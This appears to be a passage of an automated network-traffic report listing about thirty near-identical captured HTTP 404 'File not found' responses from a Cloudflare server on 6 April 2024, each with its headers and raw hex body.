                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFb8fynM98Cq7W7RU%2BIXPo0IEcbAlGC94r9I6h3rbRLSf8wzQ%2Fkxy4mUcWDruhpgARf8ZSyXtS5M7WD3drKPK4O8rJMWFnAbJCHW18s8KqbVv0qkugJUqdM4ng2MyvpTNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012631bdc7425-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAUuJNb1JeodDMjtSVo4u7eKmWAeb1HUj7%2BkUgG7XYn%2B%2BP2FYKR5p8%2BhXdEYyK9OcgcDcib1%2BYyARgiIVpB4%2Fgev2iO3SEVOtUONG48mFc3uEEBYLR7s2FfxFecvIHcVeg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001267e991336e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSvPD8%2FdGTkLhD9RPbD3jeec39d1T0P2lZD5d%2B3UcMKzq4RBUIIl85Nv4zmNTQAVvZwkyuzbOEYy%2F42be5254zU8q2yZUPBb60lgQIVEowK%2FgGgbDpcWo44EJ5J9mA2HHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700126cbccba581-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2Fgq58GDnT02%2BRYIilL2ofIB946j8NE2bwPOtKHsWpm4DED9D0%2FOSd%2BnJ8c5zH6kNaIIG89t4TDPwFAjBtGoFjvkNhpaU9Ft7muzm%2BFyEgbgej45DFKVlr8D56FbQ69D6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012717e446c87-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhnZN9ts4RCNj7FgnFLFAj%2BZ8jQAp6CYBYpuvwfx0wWOQxuuLE2BghGlX0pV%2F1zq%2Bt7Gq%2FNYZXYhmGEWDY%2BQRyZdHzq1mzYdBZXsPitKoLHHJ2xcKDo2JrNpdiy1U5TJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012763f793dd3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKN68DMbL8v0GuYIwVr7ht7SbUJWsfR5hH8PdegMlpVlFvBP%2Fj8UNcA52vgLHCA7tWacvJIQntAexla%2Bk%2B4CGJ%2FJtNR407z5LbZWUw2XAlwR6gz4A8uJgOFEcC5IzRa2jA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700127b0dd69ab7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEohaYpeqh8p6LNWGQLHpyXchu2yL6syDMtZ2X1ItEn%2FD6mWeWpj%2B3fcRDIz2od%2Fmg5CFsoW2s4Cm73Kvtt91IGlhaJNJ49DuaHXgmdCgxE9ZKGh89NgYjBlNwSf3SeEkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001280081aa4cd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J4NHIlitFD4ErDgVcliQ77jybBd94uEVoNs7yyPL1hXWQ9sOinvutGqq0EBaInl8yHUXk0TYTr4zNvTcErANmKDWLhqt4RHHmSWLHuUUnXxOOtul6oG5mcPjcPK2TiUCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001284e9d35c6a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N66M2Q1wyrm5PMvSMeFtDJKo5xCDv002xcH%2F%2BNgTzM5BFgVVbXzCa6h2FR87vYWJHVa1GbhTEVA%2Bg3WD9blpa9e%2BXRkI1LQzroMMWS1i6J2Zhh%2FlU%2BoTMTfob2E2M5s1Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001289ce77a524-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5FEmxsuekXb05rYBlCiPDt%2Fl4X1YbrP8et%2FieljZ%2BhNRIN7wQhz0jhRKM77mVnWMTARl01ejwdsmPQ1WEIbvmNCu9ZhopPX25an4ilCuQQR1YkY%2FByaie%2FnkWD0Iq%2FXmg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700128ead2d9ab3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQIc0BlZKlqzETXG8y9kkQBUUQ%2FwbAB%2BjjDe%2B08evMZUWKZ9l4%2FGXMyHNLzG4dRQcXs2WsCKeev4RC7M0b7HQctpmWx37bHLFM226oBJ9DKAxNFdDTnOAQ%2FHY5V8P%2Bsknw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001293881bdb25-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jh2jxEmIRsX6J8aXUF4jae28LXPGGoD2s5NvBoMi2XYNkbUZ8UZdNR7aq95z5QUnZ4cm6NKTzIx31BqNPDoTeaRgWUUib5O7awkX3g0V5ldgXd58fCPpdGFqqAhJEP0pbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012986e288dba-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tiD3FsR974Fv9vT2itZMy2PMP%2FlPcoDr16YuLU5s6Evr201CXBi5b1BVERG1H%2FDrNUFhaB%2Fca%2FCY3WwxeRN2D%2Bd4ksLcGJAZRUGAYgFLKuXBX%2BYk5OWI5tkLmjM%2Fe8QUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700129d4b5b099e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gV4tNH%2F8w05KMoxlR6UnRJL5PdWziM%2FixS2cDXbj8gpa6G6UJi%2BDOdPyCgsxvTJNr%2Bbfhd7HbRN0kCs6kFeCmvto%2B13SqGWfhxqgNMRnij95SGgFc%2FDfm0rtIt5Epe73xA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012a24f16a548-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pB3vkk3DHCWOGxLgUq7X4XT4BlvMyk8ErrHQo5%2F32N4T4EbQEaqMWh4rkZNIAKmang0vD8RFaOSjOdTAZbr2icVkQpvncuYJoqCezvlGCizghOY1N7%2B6YHxxUEXJIzCvg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012a71b51daa3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agiLO4zgrf3Y6eqkI0SK2T281GUpuhlXLDCB%2F8DG25P3jLAH1%2BlCdcDZnOqc5d5qcQmG0eKJox%2B5pOcFNcuLTLLHuL8v7F0Q2m1GeWjW83SY2ohl3dQdyYbQQ3%2FcMG0fPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012ac0d37a4c1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bR%2FqdJxIlx3oW9t%2FUietnG8z0HPiyxseWMi9peiOPEBq3qXEYsojkf6srzaMGpkPpWNUIhZdsVfWoXifRjhgXHB4FU765njyqwoQeoM0d2pc%2FpKPv1TRzz2OglGzdmnFmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012b0fa59a4e0-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qH7m8j4ebmoyGfDMemOeD78DUImnp6EQtsw7qsk2sYFwDBLGYBVBZexCQqQDj%2BOPc2lhJR%2B5Mi2trqx8KR%2F7J4RUVfIs3xCFBipnHbtvktNPoXyA%2ByYK47c63J3bdM0Qww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012b5dc9a9add-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTBo15iVik1TXKZthpAse090lGWcnFua%2B4KcUjlhofaUCmQPpyRjH8syy%2FZd8FwfYhbf37Wnq61BSQWGEeJ1fXzQqymj2n%2BB9UQTY%2FHCDLl1%2FXsbOunkObsm%2BJFhrKcwGg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012ba9e26a55e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K7NqMYgptKHO1g6MzCQXpe4H1FfJ%2Faiy775NiBjfbX4F3rIV4AD4Ii1wLZ%2BopoHdv%2FwI3%2Bx2btKvsksCiE4NPyTRQeDhTaYybKLsjJOnUQqDOLEW2k0DyqI%2FrPqgoy74Ig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012bf6b8e5d10-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PicQS5CZoBfFqiKTRBYUhxEUn%2BX9zLWkjnFwzvQGztym8D%2FM9reBGzpAbJPDn2JyHcSZ7hlhRfCMKMQpDSh%2FfH%2Bfeqvwu0RyXztdN8xb5LePoRysQmDwnwC%2FAveSM%2BMsXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012c42c7ddad5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=roue5Ty1xBVy%2Bl8kOBbrJo%2BDazr5gcbO03DB%2FWcz0dFAOq7UlsnJ4AjuyBSdHMAFpiWxEvl0erU8q1vwb0te4SWtiCgrS0TwsuwIYjpYZ3YcTJuVXM37Wax5T%2B7cHEncaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012c8fa785c6f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFXi%2Fi11X8H091AhWvOHg%2BlvDZPyO10Kz19pSv3AqxB8m3HSPbec%2BW5%2BQYIxbKZqIiB6GBrIpCso85Qo22A6t2tz1nAL17jzcf0XSsT8SFYi3gRL6duc9vBFKH4PYLLAtA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012cdbd5712a7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BWeXV%2Fq2U5JM0%2BmNE3k16fRYL5k6zQfT%2F86JvwllMQje6lLFGmaOg8feVyW2BsXR9bl94YkDjc7G3Das0xwFuOxgHH7SrfFVMDmrle1luJUYn8Mwbjll2mJQtHL7QkQoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012d29cf60306-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdW0PsVramC5DARwKMyvGetN4yuyoAo75HXSW8%2BjSWp3Ulfu2wpIkSeiPUE4kL7CAdIedM0ex6aTGhBa45IgrGf5s%2FtqRAqMCUJSz9iAm2EW8UxwGKTDJChfvn6Zd9Liew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012d78879749b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGN5aB3J04%2FyS365v6%2B4PyMsD234ZDfIjc%2F9UFLpMKb64x2cgVkGnIke3nB6cHceGgpFVw38TRBv1hm6nn7k3X4HUK6cPC60wYF43RMy1FQ5qt0F3P2Fd2%2BA8%2FpMNNjoeg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012dc7bab67b6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkgB%2FLkTH7CTZzuQih0GVx%2Bp%2Bge3J2WS1y2EgaaADG%2BSS6TKbyC4YfwGMuVquHZME%2FBfAoQ0JgIDTgDCJYq2aX0ADQKovGsITa0PNLRGcSrwpNBrOGP%2BS%2FBzo6XmqoMaAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012e14b099ac3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccwN%2FpCdPy%2FwPKAMvwDsfiF3U7jjIhQUt8f0%2Fbvs2Jo9PaADCGqTNMvOAIpkfbbtzZhyY5YN4qneMfx2A07JA%2Bq4WtbMB18%2Ff04np%2FjdAmtUv%2FV1aclwh4H7UGOWcnyS0w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012e66d731283-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAHkxWa0D4GcqfCe4DJwESRChVEDVlKcZ0KJS0e5yte2UxBEpNsEPD9GpVuVyUH4NxIP5R0MGifwSndIHskUWag%2B%2Bbt8KH9vEl2U03JoVZBvxI1iXUjv5vcIAz0QPsP39Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012f4ab24b3e3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t46F777Fxa%2BJJh4mNZOBK4Jx3wAE%2Fwdo0%2FrJyTioFBY7bRjRndv%2FtTOQ8yLn3bajBfnaDZEK1M%2BcpZgO9t2vGbDRv0NewZb0sUFlgDSFZ9K590eDXlIlawaPrN%2BmUhQbyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012f98b9531ea-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dNRpSdAPuYYGpHnw4NKdVL2lPXBg1kZBY9RHqmOeELLvJe3sP83uw4Qw2nXxRCnYbJon%2BWxoUuDjWgUhCcUZOlD%2BcOYSEDvkOAJKwblkr91gp1K8GpkcGs%2B5eh2MZWpbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012fe4ba25c6c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptBZFbctPrL1REctM6vRt6Sig%2Bhhqvr3J6Vy018vwpb5ayomFDN7O8og90oLmwrTfM7%2BbKoG5UrZZbkzKsHfZiuRYAYzDrItABZX%2BUmHd4%2FG8SXu76yOLB%2FJGjYDUZFGLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013031fe58bff-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
